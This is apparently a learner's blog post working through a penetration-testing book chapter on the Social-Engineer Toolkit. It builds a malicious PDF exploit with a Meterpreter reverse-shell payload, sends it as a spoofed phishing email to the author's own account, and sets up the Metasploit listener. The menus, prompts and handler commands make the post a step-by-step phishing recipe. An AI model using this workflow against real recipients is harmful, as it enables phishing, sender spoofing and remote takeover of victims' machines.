This post follows instructions given in chapter ten (The Social-Engineer Toolkit) of Metasploit: The Penetration Tester’s Guide, Previous post here.
Here’s what we’re greeted with in the terminal on starting The Social-Engineer Toolkit (SET):
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About99) Exit the Social-Engineer Toolkit
We’ll select one and are shown the below:
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules99) Return back to the main menu.
And select one again.
The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure “Sendmail” is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template99) Return to Main Menu
We’ll select one again:
Select the file format exploit you want.
The default is the PDF embedded EXE.********** PAYLOADS **********
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player “Button” Remote Code Execution
6) Adobe CoolType SING Table “uniqueName” Overflow
7) Adobe Flash Player “newfunction” Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Apple QuickTime PICT PnSize Buffer Overflow
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
19) Adobe Reader u3D Memory Corruption Vulnerability
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
We’ll select eight which is a heap-based exploit.
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
And now number two:
set:payloads>2
set> IP address for the payload listener: 192.168.1.70 <– Enter attacking IP address
set:payloads> Port to connect back on [443]: <– Enter attacking listening port
[-] Defaulting to port 443…
[-] Generating fileformat exploit…
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.Right now the attachment will be imported with filename of ‘template.whatever’
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don’t care.
2. Rename the file, I want to be cool.
We’ll keep the default filename by entering one.
Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer99. Return to main menu.
We’ll select one:
Do you want to use a predefined template or craft
a one time email template.1. Pre-Defined Template
2. One-Time Use Email Template
And select one again:
Available templates:
1: Baby Pics
2: Order Confirmation
3: Status Report
4: How long has it been?
5: Dan Brown’s Angels & Demons
6: New Update
7: Computer Issue
8: Strange internet usage from your computer
9: WOAAAA!!!!!!!!!! This is crazy…
10: Have you seen this?
We’ll go for option three:
Send email to: Enter target email address
I’m going to send this to one of my web based email accounts:
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
I originally selected option one, but Gmail (and all my other web based emails) kept refusing the connection as the email had a potentially dangerous attachment and so was forced to use option two and use my server based email address.
set:phishing>2
set:phishing> From address (ex: moo@example.com):My email address
set:phishing> The FROM NAME user will see: :Make up a name
set:phishing> Username for open-relay [blank]:My server based email address
Password for open-relay [blank]: Password for server email
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com): Email server address
set:phishing> Port number for the SMTP server [25]: Outgoing server email port number
set:phishing> Flag this message/s as high priority? [yes|no]:y
[*] SET has finished delivering the emails
At this point I checked my “target” email account and an email had duly arrived entitled “Status Report” and a PDF attachment, simply entitled “Template”.
Interestingly, I tried to reply to the “sender” but the email address was not available, which is rather handy for stealth.
I opened the pdf attachment out of curiosity and it appeared blank, but it must somehow set off the buffer overflow and and in the process connect to the attacking machine.
Meanwhile, in the terminal I was asked:
set:phishing> Setup a listener [yes|no]:y
Which consequently activated Metasploit:
[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.70
LHOST => 192.168.1.70
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.70:443
[*] Starting the payload handler…
It would have been rather satisfying to see this exploit complete, but that’s as far as I can go for the moment.
